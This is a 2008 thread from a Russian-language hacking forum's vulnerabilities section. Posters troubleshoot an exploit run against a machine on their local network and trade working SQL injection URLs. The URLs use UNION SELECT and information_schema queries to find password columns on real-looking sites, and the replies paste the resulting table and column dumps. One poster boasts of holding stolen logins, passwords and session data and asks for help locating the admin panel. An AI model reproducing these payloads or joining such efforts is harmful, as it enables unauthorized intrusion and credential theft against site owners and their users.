HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.09.2008, 20:47
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

у мя вот примерно такаяже проблема как у дизнта , я в локале нашол уязвимую тачку пробую запустить експлоит вроде все норм запускаеться :

но как видно на скрине команды тупо не выполняються... искал я на ету тему в гугле инфу нашол скрин удачного пробивава етим сплоитом и там после WooT вылетала командная строка а тут нет... Как етого можно добиться?
 
Ответить с цитированием

  #2  
Старый 30.09.2008, 20:53
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

warlok +500 не выполняються команды! ВОЗМУТИТЕЛЬНО!
 
Ответить с цитированием

  #3  
Старый 30.09.2008, 20:55
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Обновления может стоят... фиревол, антивирус...
 
Ответить с цитированием

  #4  
Старый 30.09.2008, 22:07
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

вот етого я незнаю что у него там стоит))) но тип етот самоувереный болван)
 
Ответить с цитированием

  #5  
Старый 02.10.2008, 01:04
AHMED HASSAN
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме:
110445

Репутация: 1
По умолчанию

NEED HELP WITH THIS

/showdetials.php?id=53%20union%20select%201,2,3,4,5 ,6,7,8,9,10,database(),12,13,14,15%20--

IT WORKS WILL

AFTER I DO WITH INFORMATION_SCHEMA.TABLES

/showdetials.php?id=53%20union%20select%201,2,3,4,5 ,6,7,8,9,10,concat(table_name,0x3e,column_name,0x3 e,table_schema)
,12,13,14,15%20from%20information_schema.columns%2 0WHERE%20column_name%20LIKE%20CHAR(37,112,97,115,1 15,37)--

NOTHING I DIDNT SEE THIS BEFORE SO PLS HELP
 
Ответить с цитированием

  #6  
Старый 02.10.2008, 01:32
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
По умолчанию

showdetials.php?id=53+union+select+1,2,3,4,5,6,7,8 ,9,10,UNHEX(HEX(concat(table_name,0x3e,column_name,0x3e,table_sch ema))),12,13,14,15+from+information_schema.columns +WHERE+column_name+LIKE+CHAR(37,112,97,115,115,37)/*



Код:
 13  	
course_enroll>course_enroll_pass>elearn

التاريخ : 8
	
13 	
dept_member>PASS>elearn

التاريخ : 8
	
13 	
members>PASS>elearn

...
...

Последний раз редактировалось Red_Red1; 02.10.2008 в 02:13..
 
Ответить с цитированием

  #7  
Старый 02.10.2008, 01:57
AHMED HASSAN
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме:
110445

Репутация: 1
По умолчанию

showdetials

U DID GOOGLE ON THIS

HAHA THANX MAN U REALY APRO

BUT IT APPEARS ON WHAT SOURCE OR WHAT
 
Ответить с цитированием

  #8  
Старый 03.10.2008, 12:17
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

admin_access
admin_groups
content_categories_est
content_categories_rus
content_links_eng
content_links_est
content_links_rus
content_objects_eng
content_objects_est
content_objects_rus
ctlg_projects
gallery
news_eng
news_est
news_rus
nlsbo_est
nlsbo_rus
nlsf_est
nlsf_rus
sets_languages
users_sess

Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=

ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.
 
Ответить с цитированием

  #9  
Старый 03.10.2008, 14:08
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
По умолчанию

Цитата:
Сообщение от Велемир  
admin_access
admin_groups
content_categories_est
content_categories_rus
content_links_eng
content_links_est
content_links_rus
content_objects_eng
content_objects_est
content_objects_rus
ctlg_projects
gallery
news_eng
news_est
news_rus
nlsbo_est
nlsbo_rus
nlsf_est
nlsf_rus
sets_languages
users_sess

Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=

ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.

Скрипт наверника самописный! А вобще скинь сылочку нада так посмотреть!
 
Ответить с цитированием

  #10  
Старый 03.10.2008, 18:15
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

Цитата:
Сообщение от geforce  
Скрипт наверника самописный! А вобще скинь сылочку нада так посмотреть!
Ту же самую структуру я на десятках сайтах видел)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.